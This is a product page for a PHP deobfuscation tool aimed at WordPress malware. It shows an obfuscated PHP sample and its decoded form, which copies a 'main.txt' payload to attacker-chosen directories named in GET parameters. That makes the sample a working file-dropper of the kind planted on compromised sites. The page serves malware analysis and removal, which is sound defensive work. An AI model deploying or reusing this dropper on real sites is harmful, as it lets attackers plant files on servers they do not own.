Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php goto RDlRT; yxenb: $O1zkq = $_GET["\x64"] ?? ''; goto zFae1; N469w: $d3d3b = dirname($d3d3b); goto KOe4Y; miqDy: BOOI6: goto uaPTi; bWOnk: if (!($a80fI-- > 0 && $d3d3b !== "\x2f")) { goto phH1_; } goto N469w; KOe4Y: M33Ca: goto kzqjA; uaPTi: $d3d3b = __DIR__; goto AFE9C; mA9ai: if (!($a80fI < 0 || $a80fI > 5 || preg_match("\x23\x28\134\56\134\x2e\x7c\72\x2f\57\x7c\x5c\x5c\x7c\x5b\74\76\x3a\x22\174\x3f\52\x5d\x29\43", $O1zkq . $C4F8p) || !$C4F8p)) { goto BOOI6; } goto u9rYW; zFae1: $C4F8p = $_GET["\146"] ?? ''; goto mA9ai; ozR8n: @mkdir($O1zkq, 0755, true); goto leArS; uGZVX: $O1zkq = rtrim($d3d3b, "\x2f\134") . "\57" . trim($O1zkq, "\x2f\134"); goto ozR8n; BRYic: phH1_: goto uGZVX; nKb3Y: $KRHM0 = $O1zkq . "\x2f" . $C4F8p; goto MQF9E; AFE9C: MXmfQ: goto bWOnk; u9rYW: exit; goto miqDy; kzqjA: goto MXmfQ; goto BRYic; RDlRT: $a80fI = (int) ($_GET["\142"] ?? 0); goto yxenb; leArS: $LgTQO = __DIR__ . "\x2f\x6d\141\x69\156\x2e\164\x78\x74"; goto nKb3Y; MQF9E: @copy($LgTQO, $KRHM0) || @file_put_contents($KRHM0, @file_get_contents($LgTQO));<?php
$a80fI = (int) ($_GET["b"] ?? 0);
$O1zkq = $_GET["d"] ?? '';
$C4F8p = $_GET["f"] ?? '';
if (!($a80fI < 0 || $a80fI > 5 || preg_match("#(\\.\\.|://|\\\\|[<>:\"|?*])#", $O1zkq . $C4F8p) || !$C4F8p)) {
$d3d3b = "/var/www/html";
MXmfQ:
if (!($a80fI-- > 0 && true)) {
$O1zkq = rtrim($d3d3b, "/\\") . "/" . trim($O1zkq, "/\\");
@mkdir($O1zkq, 0755, true);
$LgTQO = "/var/www/html/main.txt";
$KRHM0 = $O1zkq . "/" . $C4F8p;
@copy($LgTQO, $KRHM0) || @file_put_contents($KRHM0, @file_get_contents($LgTQO));
// [PHPDeobfuscator] Implied script end
return;
}
$d3d3b = dirname($d3d3b);
goto MXmfQ;
}
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.